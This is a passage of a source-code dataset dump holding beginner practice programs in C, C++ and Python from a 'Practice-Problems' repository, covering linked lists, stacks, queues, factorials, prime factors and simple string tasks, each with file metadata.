0;\n}\n\n" }, { "alpha_fraction": 0.4315352737903595, "alphanum_fraction": 0.4522821605205536, "avg_line_length": 17.576923370361328, "blob_id": "a99fd10f01f72e0171a4259b3e046c7df77525e6", "content_id": "586afd331cc69366c764fe60ccae5def5bbaaf30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 43, "num_lines": 26, "path": "/Prime Factors.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "import math\n\nprime = None\n\ndef sieve(n):\n global prime\n prime = [True] * (n+1)\n for i in range(2, int(math.sqrt(n))+1):\n j = 2\n if prime[i]:\n while(i*j <= n):\n prime[i*j] = False\n j += 1\n\ndef primeFactors(n):\n factors = []\n sieve(n)\n itr = 2\n while itr <= n:\n if prime[itr]:\n if n % itr == 0:\n factors.append(itr)\n itr += 1\n return factors\n\nprint(primeFactors(17))" }, { "alpha_fraction": 0.3576779067516327, "alphanum_fraction": 0.37172284722328186, "avg_line_length": 18.77777862548828, "blob_id": "6a72f48d268b597a65436ed6b1b282ad02e6aa96", "content_id": "e469b2e9a923973f4662ad998b035d4aec24e81c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1068, "license_type": "no_license", "max_line_length": 97, "num_lines": 54, "path": "/vowel consonant 1.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n input:\n T lines 
of string\n output:\n print vowels and consonants separately\n*/\n\n#include <stdio.h>\n#include <ctype.h>\n\nint main()\n{\n FILE *fptr;\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T;\n char str[10001];\n\n fscanf(fptr, \"%d\", &T);\n printf(\" T = %d\\n\", T);\n\n if(T <= 0 || T > 100)\n {\n printf(\"Input Error!\");\n exit(1);\n }\n\n for (int k = 0; k < T; k++)\n {\n fscanf(fptr, \" %[^\\n]\", str);\n //printf(\"%s\\n\", str);\n for(int i = 0; str[i]; i++)\n {\n str[i] = tolower(str[i]);\n if(str[i] == 'a' || str[i] == 'e' || str[i] == 'i' || str[i] == 'o' || str[i] == 'u')\n printf(\"%c\", str[i]);\n }\n printf(\"\\n\");\n for(int i = 0; str[i]; i++)\n {\n if(str[i] != 'a' && str[i] != 'e' && str[i] != 'i' && str[i] != 'o' && str[i] != 'u')\n printf(\"%c\", str[i]);\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.4092009663581848, "alphanum_fraction": 0.4285714328289032, "avg_line_length": 15.15686321258545, "blob_id": "af74fe137972cfb20ba8d63e38e8eaccf36c8572", "content_id": "dfc2dba24d660f9628a2071366e143daf1927eeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 826, "license_type": "no_license", "max_line_length": 51, "num_lines": 51, "path": "/factorial.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: T numbers where 0 <= n <= 15\n Output:\n factorial(n)\n*/\n\n#include <stdio.h>\n\nint up = 15;\nint low = 0;\n\nlong long int factorial(int n)\n{\n if(n >= low && n <= up)\n {\n long long int result = 1;\n for(int i = 1; i <= n; i++)\n result *= i;\n\n return result;\n }\n\n return -1;\n}\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n);\n printf(\"%d! 
= %lld\\n\",n, factorial(n));\n }\n //printed list is unsorted\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n\n" }, { "alpha_fraction": 0.49789029359817505, "alphanum_fraction": 0.5400843620300293, "avg_line_length": 17.30769157409668, "blob_id": "1e6256621d05943c6672867328d755e581d3c47b", "content_id": "b0e1002df187601ff5610785832f7d9578e23dde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 40, "num_lines": 13, "path": "/Int to String.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def intToString(n):\n temp = n\n strarr = []\n while(temp):\n char = chr(temp % 10 + ord('0'))\n strarr.append(char)\n temp = temp // 10\n\n strarr.reverse()\n\n return \"\".join(strarr)\n\nprint(intToString(41413))" }, { "alpha_fraction": 0.4576023519039154, "alphanum_fraction": 0.4736842215061188, "avg_line_length": 16.075000762939453, "blob_id": "53e0f4164a0853bb9f3395d5cb994814d8e41075", "content_id": "a61562052b8cbc5b4f9ecac3280c3eccdc3de555", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 684, "license_type": "no_license", "max_line_length": 43, "num_lines": 40, "path": "/balanced parentheses.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\nusing namespace std;\n\nbool IsBalanced(char input[])\n{\n char data[100], lastChar;\n int len = strlen(input), top = 0;\n\n for(int i = 0; i < len; i++)\n {\n if(input[i] == '(')\n {\n data[top] = '(';\n top++;\n }\n else if(input[i] == ')')\n {\n if(top == 0) return false;\n top--;\n }\n }\n\n if(top == 0) return true;\n else return false;\n}\n\nint main()\n{\n char input[100];\n scanf(\"%s\", input);\n\n if(IsBalanced(input)) printf(\"True\\n\");\n else printf(\"False\");\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.473053902387619, "alphanum_fraction": 0.47562018036842346, "avg_line_length": 19.437063217163086, "blob_id": "7596f9535e79ee5cee5645140c4537e3b0893a0f", "content_id": "a5c810cc46b7edca9e6a5c43ebf483a82aa1d207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5845, "license_type": "no_license", "max_line_length": 74, "num_lines": 286, "path": "/Singly Linked list.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n#include <stdlib.h>\nusing namespace std;\n\ntypedef struct node Node;\n\nstruct node\n{\n int data;\n Node *next;\n};\n\nclass LinkedList\n{\npublic:\n Node *head;\n Node *tail;\n\n LinkedList()\n {\n head = NULL;\n tail = NULL;\n }\n\n //checks if list is empty. returns true if empty, false otherwise\n bool EmptyList()\n {\n if(head) return false;\n else return true;\n }\n\n //Creates Nodes with NULL next pointer\n Node* CreateNode(int item)\n {\n Node *newNode = (Node *) malloc(sizeof(Node));\n\n if(newNode == NULL)\n {\n printf(\"Error! 
Couldn't create new node\\n\");\n return NULL;\n }\n newNode->data = item;\n newNode->next = NULL;\n\n return newNode;\n }\n\n //Searches Nodes using data value, returns the node found\n //in case of multiple match, returns the first instance\n Node *SearchNode(int item)\n {\n if(EmptyList())\n {\n printf(\"Empty List, nothing to search for\\n\");\n return NULL;\n }\n\n Node *current = head;\n while(current != NULL)\n {\n if(current->data == item) break;\n current = current->next;\n }\n\n if(current == NULL) printf(\"No such node found in search\\n\");\n\n return current;\n }\n\n //Inserting in front of list\n void Prepend(int item)\n {\n Node *newNode = CreateNode(item);\n\n if(EmptyList())\n {\n head = newNode;\n tail = newNode;\n return;\n }\n\n newNode->next = head;\n head = newNode;\n }\n\n //Inserting at the end\n void Append(int item)\n {\n Node *newNode = CreateNode(item);\n\n if(EmptyList())\n {\n head = newNode;\n tail = newNode;\n return;\n }\n\n Node *current = head;\n while(current->next != NULL)\n {\n current = current->next;\n }\n\n current->next = newNode;\n tail = newNode;\n\n }\n\n //Inserting after a certain data valued node\n void InsertAfterItem(int item, Node *previousNode)\n {\n Node *newNode = CreateNode(item);\n if(EmptyList())\n {\n head = newNode;\n tail = newNode;\n }\n\n if(previousNode == NULL)\n {\n printf(\"Node not specified, Can't add\\n\");\n return;\n }\n\n newNode->next = previousNode->next;\n previousNode->next = newNode;\n if(previousNode == tail) tail = newNode;\n }\n\n //O for empty node\n int CountNode()\n {\n if(EmptyList())\n {\n printf(\"\\nEmpty List\\n\");\n return 0;\n }\n\n int result = 0;\n Node *current = head;\n while(current != NULL)\n {\n result++;\n current = current->next;\n }\n\n return result;\n }\n\n //Removes node with data value\n //In case of multiple Node having same data, first instance is deleted\n void RemoveItem(int item)\n {\n if(EmptyList())\n {\n printf(\"\\nEmpty List, Can't remove anything\\n\");\n return;\n }\n\n Node *target = SearchNode(item);\n //printf(\"target->data = %d\\n\", target->data);\n\n if(target == NULL)\n {\n printf(\"No such node to delete\\n\");\n return;\n }\n\n if(target == head)\n {\n if(target == tail)\n {\n head = NULL;\n tail = NULL;\n return;\n }\n head = head->next;\n free(target);\n return;\n }\n\n Node *current = head;\n while(current->next != target)\n {\n current = current->next;\n }\n\n current->next = target->next;\n if(target == tail) tail = current;\n free(target);\n }\n\n //position starts from 1\n //removes node from specified position\n void RemoveAtPos(int position)\n {\n int len = CountNode();\n //printf(\"len = %d\\n\", len);\n\n if(len < position)\n {\n printf(\"Invalid position, not deleted anything\\n\");\n return;\n }\n\n Node *target;\n\n if(len == 1)\n {\n target = head;\n head = NULL;\n tail = NULL;\n free(target);\n return;\n }\n\n Node *current = head;\n\n while(position-2)\n {\n position--;\n //printf(\"pos = %d\\n\", position);\n current = current->next;\n }\n\n //printf(\"current = %d\\n\", current->data);\n\n target = current->next;\n\n current->next = target->next;\n if(target == tail) tail = current;\n free(target);\n }\n\n void PrintList()\n {\n if(EmptyList())\n {\n printf(\"Empty List\\n\");\n return;\n }\n\n Node *current = head;\n printf(\"Current List:\\n\");\n while(current != NULL)\n {\n printf(\"%d->\", current->data);\n current = current->next;\n }\n printf(\"\\n\");\n }\n\n void headtail()\n {\n if(head == NULL && tail == NULL)\n {\n printf(\"No head or 
tail\\n\");\n return;\n }\n printf(\"head = %d, tail = %d\\n\", head->data, tail->data);\n }\n};\n\nint main()\n{\n LinkedList lList;\n Node *temp;\n //lList.RemoveAtPos(4);\n //lList.RemoveItem(4);\n lList.Prepend(1);\n lList.Append(2);\n lList.PrintList();\n lList.headtail();\n lList.Prepend(0);\n lList.Append(2);\n lList.headtail();\n lList.PrintList();\n //lList.RemoveItem(2);\n temp = lList.SearchNode(2);\n lList.InsertAfterItem(5, temp);\n lList.headtail();\n lList.PrintList();\n return 0;\n}\n" }, { "alpha_fraction": 0.5005123019218445, "alphanum_fraction": 0.5097336173057556, "avg_line_length": 20.854476928710938, "blob_id": "8494fa77bec2cb4053c095a38be20e06f3f57be5", "content_id": "0855b4c69c3614a0400587bb938f02d27925b1cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 61, "num_lines": 268, "path": "/LinkedList.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "from collections import defaultdict\n\nsuccess = 1\nfail = 0\n\nclass Node:\n def __init__(self, val = 0, next = None):\n self.val = val\n self.next = next\n\n# delete , insert, search, print, insert last, insert before\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def makeNode(value, next):\n node = Node(value, next)\n return node\n\n def isEmpty(self):\n if self.head is None:\n print(\"List is empty\")\n return True\n return False\n\n def search(self, target):\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n\n temp = self.head\n while temp is not None:\n if temp.val == target:\n return temp\n temp = temp.next\n\n if temp is None:\n print(\"Not in list\")\n\n return None\n # 1 2 3 4 5\n def searchBefore(self, target):\n # last element is not returned\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n\n if self.head.val == target:\n return None\n\n temp = self.head\n while temp.next is not None:\n if temp.next.val == target:\n return temp\n temp = temp.next\n\n print(\"Not in list\")\n return fail\n\n def insertFirst(self, value):\n node = Node(value)\n\n if self.isEmpty():\n self.head = node\n return success\n\n node.next = self.head\n self.head = node\n return success\n\n def insertLast(self, value):\n node = Node(value)\n\n if self.isEmpty():\n self.head = node\n return success\n\n temp = self.head\n while temp.next is not None:\n temp = temp.next\n\n temp.next = node\n return success\n\n def insertAfter(self, value, target):\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n\n targetNode = self.search(target)\n\n node = Node(value)\n node.next = targetNode.next\n targetNode.next = node\n\n return success\n\n def insertBefore(self, value, target):\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n # 1 2 3 5\n node = Node(value)\n targetNode = self.searchBefore(target)\n\n # in case of before head\n if targetNode is fail:\n print(\"Nothing to search\")\n return fail\n\n if targetNode is None:\n node.next = self.head\n self.head = node\n return success\n\n node.next = targetNode.next\n targetNode.next = node\n\n return success\n\n def delete(self, target):\n if self.isEmpty():\n print(\"Nothing to delete\")\n return fail\n\n targetNode = self.searchBefore(target)\n if targetNode == fail:\n print(\"Nothing to delete\")\n return fail\n\n if targetNode is None:\n self.head = self.head.next\n return success\n\n targetNode.next = targetNode.next.next\n return success\n\n def deleteLast(self):\n if 
self.isEmpty():\n print(\"Nothing to delete\")\n return fail\n\n temp = self.head\n prev = None\n\n if temp.next == None:\n self.head = None\n return success\n\n while temp.next is not None:\n prev = temp\n temp = temp.next\n\n prev.next = None\n return success\n\n def removeDuplicateUnsorted(self):\n if self.isEmpty():\n print(\"List is empty, nothing to remove\")\n return\n if self.head.next is None:\n return\n\n keys = set()\n prev = self.head\n temp = prev.next\n keys.add(prev.val)\n\n while temp:\n if temp.val not in keys:\n keys.add(temp.val)\n prev.next = temp\n prev = temp\n\n temp = temp.next\n\n prev.next = None\n\n # 0 = > 1 = > 1 = > 1 = > 2 = > 3 = > 4 = > 5 = > 5 = > 6\n\n def removeDuplicateSorted(self):\n if self.isEmpty():\n return\n if self.head.next is None:\n return\n\n prev = self.head\n temp = prev.next\n\n while temp:\n if prev.val == temp.val:\n prev.next = temp.next\n temp.next = None\n else:\n prev = temp\n temp = temp.next\n # if prev.val != temp.val:\n # prev = temp\n # temp = temp.next\n\n prev.next = None\n\n def reverse(self):\n if self.isEmpty():\n return None\n if self.head.next is None:\n return self.head\n\n # 1 2 3 4 5\n prev = None\n while self.head:\n temp = self.head.next\n self.head.next = prev\n prev = self.head\n self.head = temp\n\n self.head = prev\n\ndef printList(head):\n if head is None:\n return fail\n\n while head:\n print(head.val, end=\"=>\")\n head = head.next\n\n print()\n return success\n# 1 2 3 4 5\ndef reverse(node):\n if node is None:\n return None\n\n if node.next is None:\n return node\n\n new_head = reverse(node.next)\n node.next.next = node\n node.next = None\n return new_head\n\ndef main():\n ll = LinkedList()\n ll.insertFirst(2)\n ll.insertFirst(1)\n ll.insertLast(4)\n ll.insertBefore(3, 4)\n ll.insertAfter(6, 4)\n ll.insertBefore(0, 1)\n ll.insertBefore(5, 6)\n # printList(ll.head)\n # ll.reverse()\n\n ll.insertBefore(5, 5)\n ll.insertBefore(1, 1)\n ll.insertBefore(1, 1)\n\n printList(ll.head)\n\n ll2 = LinkedList()\n ll2.head = reverse(ll.head)\n printList(ll2.head)\n\n ll2.reverse()\n printList(ll2.head)\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.27986347675323486, "alphanum_fraction": 0.31655290722846985, "avg_line_length": 17.03076934814453, "blob_id": "8395621d6fdda0dfc4b3aa40c6bf19413b93553a", "content_id": "09dbc1009781bc4b2bfb308c04cfd833c3cf9ce6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1172, "license_type": "no_license", "max_line_length": 48, "num_lines": 65, "path": "/Sorting 3 numbers.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nSorting of 3 input integers\n*/\n\n#include <stdio.h>\n\nint main()\n{\n int T, n1, n2, n3, temp;\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n1);\n fscanf(fptr, \"%d\", &n2);\n\n if(n1 > n2) //need to make n1 < n2\n {\n temp = n1;\n n1 = n2;\n n2 = temp;\n }\n\n fscanf(fptr, \"%d\", &n3);\n\n if(n3 > n2)\n ;\n\n else if(n3 > n1)\n {\n temp = n3;\n n3 = n2;\n n2 = temp;\n }\n\n else if(n3 < n1)\n {\n temp = n3;\n n3 = n2;\n n2 = temp;\n\n temp = n2;\n n2 = n1;\n n1 = temp;\n }\n\n printf(\"%d %d %d\\n\", n1, n2, n3);\n }\n }\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3399638235569, 
"alphanum_fraction": 0.3725135624408722, "avg_line_length": 24.18181800842285, "blob_id": "6909add870e1189f1a87f5d67cb3d79c5ce7046c", "content_id": "b138587ffc0cca1fcad8cf04f8a14d1b4594cf25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 48, "num_lines": 22, "path": "/ZigZag Array.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def zigzagArray(arr):\n n = len(arr)\n flag = True\n for i in range(n-1):\n if flag:\n if arr[i] > arr[i+1]:\n arr[i] = arr[i] ^ arr[i + 1]\n arr[i + 1] = arr[i] ^ arr[i + 1]\n arr[i] = arr[i] ^ arr[i + 1]\n\n else:\n if arr[i] < arr[i + 1]:\n arr[i] = arr[i] ^ arr[i + 1]\n arr[i + 1] = arr[i] ^ arr[i + 1]\n arr[i] = arr[i] ^ arr[i + 1]\n\n flag = not flag\n\n return arr\n\narr = [4, 3, 7, 8, 6, 2, 1]\nprint(zigzagArray(arr))" }, { "alpha_fraction": 0.42329150438308716, "alphanum_fraction": 0.44142258167266846, "avg_line_length": 15.870588302612305, "blob_id": "fce08780b758b50448600239f63e8104e9fed73a", "content_id": "e0d53b96e30cf3a460c918695ab3bf2df12fef44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1434, "license_type": "no_license", "max_line_length": 66, "num_lines": 85, "path": "/stack.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n//#include <stdlib.h>\nusing namespace std;\n\n#define STACK_MAX 50\n\nclass Stack\n{\npublic:\n int top;\n int data[STACK_MAX];\n\n Stack()\n {\n top = 0;\n printf(\"Stack created, top = 0\\n\");\n }\n\n bool Empty()\n {\n if(!top) return true;\n else return false;\n }\n\n void push(int n)\n {\n if(top < STACK_MAX)\n {\n data[top] = n;\n top++;\n }\n else printf(\"\\nNot Enough Space\\n\");\n }\n\n void pop()\n {\n if(Empty()) printf(\"\\nStack is empty, No item to pop\\n \");\n else top--;\n }\n\n int topElement()\n {\n if(Empty())\n {\n printf(\"\\nStack is empty\\n\");\n return -1;\n }\n else return data[top-1];\n }\n\n void print()\n {\n printf(\"\\nCurrent Stack\\n\");\n if(Empty()) printf(\"*empty*\\n\");\n else\n {\n for(int i = 0; i < top; i++)\n {\n printf(\"%d \", data[i]);\n }\n }\n }\n};\n\nint main()\n{\n Stack s1;\n s1.push(5);\n s1.push(6);\n s1.push(2);\n s1.print();\n printf(\"\\nCurrent top element is %d\\n\", s1.topElement());\n //s1.topElement();\n s1.pop();\n s1.pop();\n printf(\"\\nCurrent top element is %d\\n\", s1.topElement());\n s1.print();\n s1.pop();\n s1.pop();\n s1.pop();\n s1.print();\n return 0;\n}\n" }, { "alpha_fraction": 0.5542168617248535, "alphanum_fraction": 0.5662650465965271, "avg_line_length": 5.916666507720947, "blob_id": "23e4cc3a0209d7def5f489d7e737be487941fb94", "content_id": "3699f1c3cc429968d7e396bc6dbce1146cc06ccf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 83, "license_type": "no_license", "max_line_length": 24, "num_lines": 12, "path": "/lcm.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nlcm of two given numbers\n*/\n\n#include <stdio.h>\n\nint main()\n{\n\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5490981936454773, "alphanum_fraction": 0.5531061887741089, "avg_line_length": 17.481481552124023, "blob_id": "87ea51c10ea61da0711d37e373eb7f4a191a1270", "content_id": "e0104c55c56a1ff2cece0dc3d2e90c98d11674a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 499, "license_type": "no_license", "max_line_length": 73, "num_lines": 27, "path": "/Number Count.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <fstream>\n#include <sstream>\n#include <string>\n\nusing namespace std;\n\nint main()\n{\n ifstream infile(\"D:\\\\input.txt\");\n string line, temp;\n int count;\n\n while(getline(infile, line)) //here delimiter for getline is '\\n'\n {\n count = 0;\n stringstream str(line);\n //cout << line << \"\\n\";\n\n while(getline(str, temp, ' ')) //using delimiter '\\n' to seperate\n count++;\n\n printf(\"%d\\n\", count);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3325842618942261, "alphanum_fraction": 0.3483146131038666, "avg_line_length": 12.088234901428223, "blob_id": "5b01c95664becccb75961e399991d7f206894ce5", "content_id": "2230217bd458ed57cea829e1bd736b3cece7ac74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 445, "license_type": "no_license", "max_line_length": 35, "num_lines": 34, "path": "/Odd-Even 1.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//\n\n/*\n Input:\n Number of Input\n Inputs\n Output:\n 'even' or 'odd'\n*/\n\n#include <stdio.h>\n\nint main()\n{\n int T, n;\n\n scanf(\"%d\", &T);\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n scanf(\"%d\", &n);\n if(n % 2)\n printf(\"odd\\n\");\n else\n printf(\"even\\n\");\n }\n }\n\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.41982272267341614, "alphanum_fraction": 0.4407735764980316, "avg_line_length": 19, "blob_id": "2a3c149d20fdfc0468b514a620bc782d7d262000", "content_id": "b645b1c5ffe10f57b3660c898faae02909fe72c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 61, "num_lines": 62, "path": "/word count in a given string 2.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "\n/*\n input:\n T lines of string containing , . ! ? 
: ;\n output:\n print vowels and consonants separately\n*/\n\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\nint main()\n{\n FILE *fptr;\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, count;\n char str[10001], *temp, input[10001], output[10001];\n char delim[] = \" .,!?;:\";\n\n fscanf(fptr, \"%d\", &T);\n printf(\" T = %d\\n\", T);\n\n if(T <= 0 || T > 100)\n {\n printf(\"Input Error!\");\n exit(1);\n }\n\n for (int k = 0; k < T; k++)\n {\n count = 0;\n strcpy(output, \"\\0\");\n fscanf(fptr, \" %[^\\n]\", str);\n strcpy(input, str);\n\n temp = strtok(str, delim);\n strcat(output, temp);\n// printf(\"%s\\n\", output);\n while(temp != NULL)\n {\n //printf(\"%s \", temp);\n count++;\n temp = strtok(NULL, delim);\n printf(\"output = %s, temp = %s\\n\", output, temp);\n if(temp != NULL)\n strcat(output, temp);\n }\n printf(\"check\\n\");\n strcat(output, \"\\0\");\n\n printf(\"%s -> %d\\n\", output, count);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.39759036898612976, "alphanum_fraction": 0.40963855385780334, "avg_line_length": 16.372093200683594, "blob_id": "9f8923ccb1ef7b708dbffef581db4b94caa4594c", "content_id": "9e68be3b7ee05f25bfe20474e44bc3a2aa439be4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 747, "license_type": "no_license", "max_line_length": 48, "num_lines": 43, "path": "/Perfect Square check.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nInput: T numbers\nOutput: 'yes' or 'no'\n*/\n\n#include <stdio.h>\n#include <math.h>\n\nint main()\n{\n int T, n;\n double root, diff;\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n);\n\n root = sqrt(n);\n diff = root - (int)root;\n //printf(\"%lf\\n\", diff);\n if(diff != 0.0)\n printf(\"no\\n\");\n else\n printf(\"yes\\n\");\n }\n }\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3886054456233978, "alphanum_fraction": 0.40646257996559143, "avg_line_length": 20, "blob_id": "df434e738e3ea9b199c7c6f32b15f9838aff223b", "content_id": "2fb4f169f0258ec93f84df42ae9d7631436eada8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1176, "license_type": "no_license", "max_line_length": 69, "num_lines": 56, "path": "/file_problem.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <string>\n\nusing namespace std;\n\n#define N 10\n\nint main()\n{\n FILE *fin, *f_out;\n char line[20];\n int marks[3][6], idx, n;\n char files[3][20] = {\"physics.txt\", \"math.txt\", \"chemistry.txt\"};\n\n f_out = fopen(\"out.txt\", \"w\");\n\n for(int i = 0; i < 3; i++)\n {\n for(int k = 0; k < 20; k++)\n {\n line[k] = files[i][k];\n }\n\n fin = fopen(line, \"r\");\n\n if(fin != NULL)\n {\n //printf(\"opened file %s\\n\", line);\n for(int k = 0; k < 5; k++)\n {\n fscanf(fin, \"%d\", &idx);\n fscanf(fin, \"%d\", &n);\n marks[i][idx] = n;\n //printf(\"%d %d \", idx, marks[i][idx]);\n }\n fclose(fin);\n }\n else printf(\"Error Opening file\\n\");\n }\n\n f_out = fopen(\"out.txt\", \"w\");\n fprintf(f_out, \"\\nphysics, math, chem\\n\");\n for(int i = 0; i < 3; i++)\n {\n 
fprintf(f_out, \"\\nNumbers of %dth sub are \", i);\n for(int k = 1; k < 6; k++)\n {\n fprintf(f_out, \"%d \", marks[i][k]);\n }\n }\n\n fclose(f_out);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3741626739501953, "alphanum_fraction": 0.38373205065727234, "avg_line_length": 20.77083396911621, "blob_id": "f7d64d524143c8fdb6723f4639c7d583b51a3093", "content_id": "5e3e46a672be01c9c0f0f7c8a3002481c3492745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1045, "license_type": "no_license", "max_line_length": 90, "num_lines": 48, "path": "/divisor find.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//\n\n/*\n Input: T numbers\n Output:\n all divisors of each numbers\n*/\n\n#include <stdio.h>\n#include <math.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n, limit;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n);\n limit = sqrt(n); //searching till sqrt of any number as divisors come in pairs\n //printf(\"%d \", limit);\n printf(\"Case %d:\", i + 1);\n for(int j = 1; j <= limit; j++)\n {\n if(n % j == 0)\n {\n if(n/j != j) //not a perfect square\n printf(\" %d %d\", j, n/j);\n else\n printf(\" %d\", j);\n }\n }\n //printed list is unsorted\n printf(\"\\n\");\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4413793087005615, "alphanum_fraction": 0.48275861144065857, "avg_line_length": 13.600000381469727, "blob_id": "f0b3bd6f8a76d89270f66db7cd077597b9ed7b0e", "content_id": "c1a0ce4ad6b92fea78f1e355ce0ec87f6a03e8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/check.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def countPairs():\n p = 1\n powers = [int] * 41\n for i in range(41):\n powers[i] = p\n p *= 2\n\n print(powers)\n\ncountPairs()" }, { "alpha_fraction": 0.4488416910171509, "alphanum_fraction": 0.4570463299751282, "avg_line_length": 16.709402084350586, "blob_id": "b095f049352511b3d73728c51ce30eebca4f39d4", "content_id": "78c57c1d41f6d262dd487ccbd29d8b70d220e825", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2072, "license_type": "no_license", "max_line_length": 73, "num_lines": 117, "path": "/queue.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\nusing namespace std;\n\n#define Qsize 6\n\nclass Queue\n{\npublic:\n int data[Qsize];\n int head, tail;\n\n Queue()\n {\n head = 0;\n tail = 0;\n }\n\n bool IsEmpty()\n {\n if(head == tail) return true;\n else return 